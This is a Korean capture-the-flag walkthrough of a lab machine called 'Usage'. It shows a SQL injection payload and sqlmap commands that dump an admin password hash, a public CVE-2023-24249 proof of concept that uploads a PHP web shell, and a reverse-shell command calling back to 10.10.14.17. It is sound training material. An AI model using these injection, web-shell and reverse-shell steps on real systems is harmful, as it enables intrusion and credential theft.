Proof of Concept
10.129.13.49
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpInitial Access
80 포트 웹서비스 접속 시 http://usage.htb으로 리다이렉트 됨
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel/etc/hosts 파일 수정
┌──(kali㉿kali)-[~/Usage]
└─$ cat /etc/hosts
<SNIP>
10.129.13.49 usage.htbhttp://usage.htb 접속 후 /forget-passwor 엔드포인트 email 파라미터에서 SQL Injection 취약점 발견
- Payload:
email=kalionix@gmail.com' and '1'='2
sqlmap을 사용하여 DB 목록 추출
- information_schema
- performance_schema
- usage_blog
┌──(kali㉿kali)-[~/Usage]
└─$ sudo sqlmap -r request.txt -p email --level=3 --dbs --batch --technique=B --threads=10
<SNIP>
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
18
[06:53:18] [INFO] retrieved: information_schema
[06:53:18] [INFO] retrieving the length of query output
[06:53:18] [INFO] retrieved: 18
[06:53:56] [INFO] retrieved: performance_schema
[06:53:56] [INFO] retrieving the length of query output
[06:53:56] [INFO] retrieved: 10
[06:54:18] [INFO] retrieved: usage_blog
available databases [3]:
[*] information_schema
[*] performance_schema
[*] usage_blog
[06:54:18] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 162 times
[06:54:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/usage.htb'
[*] ending @ 06:54:18 /2026-02-05/usage_blog 데이터베이스 내 테이블 목록 추출
┌──(kali㉿kali)-[~/Usage]
└─$ sudo sqlmap -r request.txt -p email --level=3 -D usage_blog --tables --batch --technique=B --threads=10 -v 0
<SNIP>
Database: usage_blog
[15 tables]
+------------------------+
| admin_menu |
| admin_operation_log |
| admin_permissions |
| admin_role_menu |
| admin_role_permissions |
| admin_role_users |
| admin_roles |
| admin_user_permissions |
| admin_users |
| blog |
| failed_jobs |
| migrations |
| password_reset_tokens |
| personal_access_tokens |
| users |
+------------------------+
admin_users 테이블 덤프하여 관리자 비밀번호 해시 획득
┌──(kali㉿kali)-[~/Usage]
└─$ sudo sqlmap -r request.txt -p email --level=3 -D usage_blog -T admin_users --batch --technique=B --threads=10 -v 0 --dump
___
__H__
___ ___[)]_____ ___ ___ {1.9.12#stable}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 07:06:08 /2026-02-05/
got a 302 redirect to 'http://usage.htb/forget-password'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: _token=IeUU6YdYAotb4xXvIL9RXvbkjp1jQGPif7OSuY5t&email=kalionix@htb.com' AND 3539=(SELECT (CASE WHEN (3539=3539) THEN 3539 ELSE (SELECT 9466 UNION SELECT 9518) END))-- RckG
---
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL < 5.0.12
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
Database: usage_blog
Table: admin_users
[1 entry]
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
| id | name | avatar | password | username | created_at | updated_at | remember_token |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
| 1 | Administrator | <blank> | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 | admin | 2023-08-13 02:48:26 | 2023-08-23 06:02:19 | kThXIKu7GhLpgwStz7fCFxjDomCYS1SmPpxwEkzv1Sdzva0qLYaDhllwrsLT |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
/etc/hosts에 관리자 도메인 추가 후 관리자 페이지 접속. 이후 이전에 획득한 계정 정보 (admin/whatever1)로 로그인
┌──(kali㉿kali)-[~/Usage]
└─$ cat /etc/hosts
<SNIP>
10.129.13.49 usage.htb admin.usage.htb관리자 패널에서 Laravel 서비스 버전 확인
- Larevel 10.18.0
해당 버전에서 파일 업로드 취약점 발견 (CVE-2023-24249)
POC 다운로드
┌──(kali㉿kali)-[~/Usage]
└─$ git clone https://github.com/ldb33/CVE-2023-24249-PoC.git
Cloning into 'CVE-2023-24249-PoC'...
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 4 (delta 0), reused 4 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (4/4), done.POC를 실행하여 웹쉘 업로드 성공
┌──(kali㉿kali)-[~/Usage/CVE-2023-24249-PoC]
└─$ python CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/shell.php웹쉘을 이용하여 리버스쉘 연결 명령 실행
┌──(kali㉿kali)-[~/Usage/CVE-2023-24249-PoC]
└─$ curl http://admin.usage.htb/uploads/images/shell.php --data-urlencode 'c=bash -c "sh -i >& /dev/tcp/10.10.14.17/4444 0>&1"'리버스쉘 연결 성공
┌──(kali㉿kali)-[~/Usage]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.13.49] 56108
sh: 0: can't access tty; job control turned off
$Read user.txt
$ cat user.txt
0baf85aa040a729f07b27184111498fd
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.13.49 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 fe80::250:56ff:feb0:1ad2 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb0:1ad2 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b0:1a:d2 txqueuelen 1000 (Ethernet)
RX packets 140926 bytes 34253458 (34.2 MB)
RX errors 0 dropped 1 overruns 0 frame 0
TX packets 99260 bytes 43958330 (43.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 454565 bytes 50400087 (50.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 454565 bytes 50400087 (50.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Privilege Escalation
lse enumeration
yes!st020 Uncommon setuid binaries........................................
---
/snap/snapd/20290/usr/lib/snapd/snap-confine
/snap/snapd/19993/usr/lib/snapd/snap-confine
---